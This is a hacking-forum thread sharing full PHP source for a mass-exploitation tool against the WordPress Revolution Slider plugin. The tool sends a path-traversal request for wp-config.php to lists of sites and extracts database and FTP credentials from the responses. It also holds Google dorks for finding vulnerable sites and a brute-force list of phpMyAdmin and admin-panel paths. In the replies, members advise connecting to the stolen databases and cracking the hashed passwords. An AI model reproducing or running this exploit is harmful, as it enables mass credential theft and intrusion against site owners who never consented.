Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


[Priv8] Mass Revslider Plugin Exploiting v1

  • 2 Vote(s) - 4.5 Average


09-22-2014, 04:55 AM #1
AMir dZ 52 Offline Junior Member **
Registered
Posts:5 Threads:3 Joined:May 2014 Reputation: 0
Mood: None
Salam All, Smiley1
in this Thread i share with u my PRIVATE tool for exploiting ...
the tool is very PRIVATE ...
The Tool Can Grab CONFIGS & FTP ...
The DORKS Are on the script ...
you put it on LOCALHOST or UPLOAD IT ....
DOWNLOAD: http://www.gulfup.com/?NBfDNQ
PHP Code:
<?
echo"
<body bgcolor='#000000' text='white'>
<title>Mass Revslider Exl0it1ng</title>
<style>
body,table{background: black; }
A:link {text-decoration: none;color: red;}
A:active {text-decoration: none;color: red;}
A:visited {text-decoration: none;color: red;}
A:hover {text-decoration: underline; color: red;}
#new,input,textarea,table,td,tr,#gg
{
border-style:solid;
text-decoration:bold;
}
input:hover,tr:hover,td:hover,textarea:hover
{
background-color: #FFFFCC;
color:green;
size:10px;
}
</style>
<center><img src='https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcSjfAs7Cqc8Gq6GTxefRk9Tt0gcWFS2B1kIgYFBs8H24UuC3UYMoA' height='150' width='150'></img><br>
<!--- Menu -----!--->
<p align='center' dir='ltr'>
<font face='Verdana' size='2' color='#FFFFFF'>#
<a href='?dz=scan' style='text-decoration: none'><font color='#006699'>IP Scanner</font></a> ~ 
<a href='?dz=exp' style='text-decoration: none'><font color='#006699'>Exploiter</font></a> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=db' style='text-decoration: none'><font color='#006699'>Find DB Panel</font></a><font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=dorks' style='text-decoration: none'><font color='#006699'>Exploit Dorks</font></a></font>



<font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=toip' style='text-decoration: none'><font color='#006699'>Domains 2 IP</font></a></font>



<font face='Verdana' size='2' color='#FFFFFF'> # </font>
<br><br>
"
;


/////////////////////////////////
if ($_GET['dz'] == 'exp') {
echo
"<form method='post'>
<textarea name='sites' cols='50' rows='12'></textarea><br>
<input type='submit' name='go' value='Exploit'>
</form>"
;
function 
findit($mytext,$starttag,$endtag) {
 
$posLeft  stripos($mytext,$starttag)+strlen($starttag);
 
$posRight stripos($mytext,$endtag,$posLeft+1);
 return  
substr($mytext,$posLeft,$posRight-$posLeft);
}
error_reporting(0);
set_time_limit(0);
$ya=$_POST['go'];
$co=$_POST['sites'];

if(
$ya){
 
$e=explode("\r\n",$co);
 foreach(
$e as $bda){
    
//echo '<br>'.$bda;
    /// you can devlope the tool ///
    
$linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
    
$dn=($bda).($linkof);
    
$file[email protected]file_get_contents($dn);
    if(
eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
    echo
"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
    echo 
"<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
    echo 
"<font face=Verdana size=-2 color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
    echo 
"<font face=Verdana size=-2 color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
    echo 
"<font face=Verdana size=-2 color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
    echo 
"<font face=Verdana size=-2 color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
    }
    elseif(
eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
    echo
'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
    echo
"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";    
    echo 
"<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
    echo 
"<font face=Verdana size=-2 color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
    echo 
"<font face=Verdana size=-2 color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
    echo 
"<font face=Verdana size=-2 color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
    }
    else{
    echo
'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';    
    echo 
"<center><font color=yellow face=Verdana size=-2>".$bda."</font><font color=white face=Verdana size=-2> ==> </font><font color=red face=Verdana size=-2>Not Infected ! </font></center>";}
    echo
'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
 }
 
}
}
/////////////////////////////////////

/////////////////////////////////////
if ($_GET['dz'] == 'dorks') {
echo
'<br><textarea cols=50 rows=12 >
inurl:wp-content/plugins/revslider/
inurl:revslider
inurl:revslider_admin.php
inurl:revslider_front.php
inurl:plugins/revslider/
intext:Powered by Revslider
intitle:"Index Of/ revslider"
intitle:"Index Of/wp-content/themes/revslider"
intitle:"Index Of/wp-content/plugins/revslider"
intitle:"Index Of/admin/revslider"
intitle:"Index Of/fr/revslider"
intitle:"Index Of/en/revslider"
intitle:"Index Of/us/revslider"
intitle:"Index Of/ar/revslider"
intitle:"Index Of/es/revslider"
intitle:"Index Of/de/revslider"
</textarea>'
;

}
//////////////////////////////////////

//////////////////////////////////////
if ($_GET['dz'] == 'toip') {
echo
"
<form method='post' ><center>
<textarea cols='50' rows='12' name='site2ip' >www.example.com
Please Romove http:// or https://</textarea></br><br>
<input type='submit' name='w2ip' value='Extract' ><br>
</center>"
;
if(isset(
$_POST['site2ip'])){ 
foreach(
explode("\n",$_POST['site2ip']) as $site4ip){ 
$ipp=trim($site4ip);
echo 
'<font color="red" size="3"></font><font color="green" size="5"><center>
<font color="Blue" size="3"</font><font color=Green face=Verdana size=-2>'
.$ipp.'</font>
<font color=white face=Verdana size=-2>  ==> </font> <font color=Green face=Verdana size=-2>'
.gethostbyname ($ipp).'</font></center></font>'
}
}
}
////////////////////////////////////

////////////////////////////////////
if ($_GET['dz'] == 'db') {


echo
'
<form action ="" method="post">
<font face=Verdana size=-2 color=wgite >URL : <input type ="text" name="site"/>
<input type = "submit" value="Find" />
</form>'
;
$site $_POST['site'];
$list = array(
'/phpMyAdmin/',
'/phpmyadmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/DB_ADMIN/',
'/db_admin/',
'/DBA/',
'/SQLI/',
'/dba/',
'/sqli/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/dev/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
'/mya/',
'/PhpMyAdmin/',
'/phpmyadmin/',
'/myadmin/',
'/mysql/',
'/sql/',
'/server/',
'/db/',
'/database/',
'/databases/',
'/adm/',
'/configuration/',
'/configure/',
'/administrator/',
'/login/',
'/moderator/',
'/controlpanel/',
'/adminpanel/',
'/admincontrol/',
'/fileadmin/',
'/data/',
'/postgresql/',
'/oracle/',
'/msssql/',
'/msaccess/',
'/sysadmin/',
'/serverdata/',
'/webadmin/',
'/admins/',
'/Database_Administration/',
'/WebAdmin/',
'/useradmin/',
'/sysadmins/',
'/admin1/',
'/system-administration/',
'/administrators/',
'/pgadmin/',
'/directadmin/',
'/staradmin/',
'/ServerAdministrator/',
'/SysAdmin/',
'/administer/',
'/LiveUser_Admin/',
'/sys-admin/',
'/typo3/',
'/panel/',
'/xlogin/',
'/smblogin/',
'/phpldapadmin/',
'/server_admin/',
'/database_administration/',
'/system_administration/',
'/ss_vms_admin_sm/',
'/adminarea/',
'/MySQL/',
'/mysql_admin/',
'/server_data/',
'/DB/',
'/DB1/',
'/DB2/',
'/DB3/',
'/DB4/',
'/DB5/',
'/DB6/',
'/DB7/',
'/DB8/',
'/DB9/',
'/DB0/',
'/db1/',
'/db2/',
'/db3/',
'/db4/',
'/db5/',
'/db6/',
'/db7/',
'/db8/',
'/db9/',
'/db0/',
'/mysql5/',
'/mysql4/',
'/root/',
'/apache/',
'/php/',
'/Apache/',
'/Php/',
'/apach/',
'/apachepanel/',
'/WEBSERVERS/',
'/DATABASE1/',
'/DATABASE2/',
'/DATABASE3/',
'/DATABASE4/',
'/DATABASE5/',
'/DATABASE6/',
'/DATABASE7/',
'/DATABASE8/',
'/DATABASE9/',
'/WEBDATA/',
'/WEB_DATA/',
'/webservers/',
'/database1/',
'/database2/',
'/database3/',
'/database4/',
'/database5/',
'/database6/',
'/database7/',
'/database8/',
'/database9/',
'/webdata/',
'/web_data/',
);

if(isset(
$site)){

foreach(
$list as $path => $test) {
$ch curl_init();
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER1);
curl_setopt($chCURLOPT_URL$site.$test);
$result curl_exec($ch);
curl_close($ch);
//print $url;
if (preg_match("/200 OK/"$result)){
echo 
"<br /><b><font face=Verdana size=-2 color=green >[+]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font></b>";
}
else if (
preg_match("/401 Unauthorized/"$result)) {
echo 
"<br /><b><font face=Verdana size=-2 color=yellow >[!]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[ $site$test ]</A></font></b>";
echo 
"<br /><b><font face=Verdana size=-2 color=red >[-]</font><font face=Verdana size=-2 color=silver > Nothing found on </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[$site$test]</a></font>";
}
}
echo 
"<br><b><u><font face=Verdana size=-2 color=#513912 >Scan Finished !</font></u></b>";
}


}
////////////////////////////////////





if ($_GET['dz'] == 'scan') {

echo 
"<br><b><u><font face=Verdana size=-2 color=#513912 >You can Devlope the Wp IP Scanner or start you idea here and send to <a href=http://[email protected] >[email protected] </a>  ....</font></u></b>";
}




?>



<center>
<code style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent); text-align:center; border-top: 0px solid #FF3300; border-bottom: 1px solid #FF3300">
<font color=#FF3300 size=1 face="Tahoma">Mass Revslider Plugin Exl0it1ng v1<font><font color=white size=1 face="Tahoma"> -</font><font color=gren size=1 face="Tahoma"> By AMir dZ 52</font></code>
</center> 
[Image: 6U9YjJ.png]

09-23-2014, 01:26 AM #2
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
great share Smiley1 and the code are good too Smiley1

[Image: xodhvlpa.jpg]
[Image: test.php]

09-23-2014, 04:20 AM #3
CromaS Offline Junior Member **
Registered
Posts:10 Threads:0 Joined:Sep 2014 Reputation: 0
Mood: Lazy
How can i connect on that DB?

09-23-2014, 05:03 AM #4
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
use some mysql client or a php script ... so hard is it not ...

[Image: xodhvlpa.jpg]
[Image: test.php]

09-23-2014, 05:13 AM #5
CromaS Offline Junior Member **
Registered
Posts:10 Threads:0 Joined:Sep 2014 Reputation: 0
Mood: Lazy
Yes, but that password dont work because is crypted...

09-23-2014, 05:33 AM #6
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
then decrypt it ...
(crack it)

[Image: xodhvlpa.jpg]
[Image: test.php]

08-31-2017, 06:26 PM #7
catchme007 Offline Member ***
Registered
Posts:116 Threads:15 Joined:Aug 2012 Reputation: 0
Mood: None
what i use for server in MySQL client if i get localhost in db ??






Forum Jump:


Users browsing this thread:1 Guest(s)